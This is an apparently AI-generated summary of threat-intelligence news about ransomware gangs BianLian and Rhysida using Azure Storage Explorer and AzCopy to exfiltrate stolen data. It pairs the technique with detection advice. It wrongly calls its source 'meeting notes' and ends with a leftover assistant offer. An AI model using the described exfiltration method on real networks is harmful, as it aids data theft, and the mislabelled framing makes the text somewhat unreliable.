September 17, 2024 at 12:16PM
Ransomware gangs like BianLian and Rhysida are increasingly utilizing Microsoft’s Azure Storage Explorer and AzCopy to steal data from breached networks and store it in Azure Blob storage. Despite extra work required to get Azure Storage Explorer operational, the focus on data theft is indicative of the increasing leverage for threat actors in the extortion phase. Azure’s trustworthiness and performance make it an attractive option for exfiltration tools, with multiple instances of Azure Storage Explorer observed being used to speed up the upload process. Detecting ransomware exfiltration involves monitoring for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints, and setting alarms for unusual file access patterns. Additionally, enabling the ‘Logout on Exit’ option is recommended to prevent attackers from using active sessions for file theft.
Based on the meeting notes, the key takeaways are:
1. Ransomware gangs like BianLian and Rhysida are increasingly using Microsoft’s Azure Storage Explorer and AzCopy to steal and store data in Azure Blob storage.
2. Azure’s enterprise-grade service is often used by companies and is unlikely to be blocked by corporate firewalls and security tools, making data transfer attempts through it more likely to go undetected.
3. To detect ransomware exfiltration, incident responders can monitor for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints, and set alarms for unusual patterns in file copying or access on critical servers.
4. It’s recommended to check the ‘Logout on Exit’ option in Azure to automatically sign out upon exiting the application, preventing attackers from using the active session for file theft.
If you need further analysis or specific action items based on these takeaways, please let me know.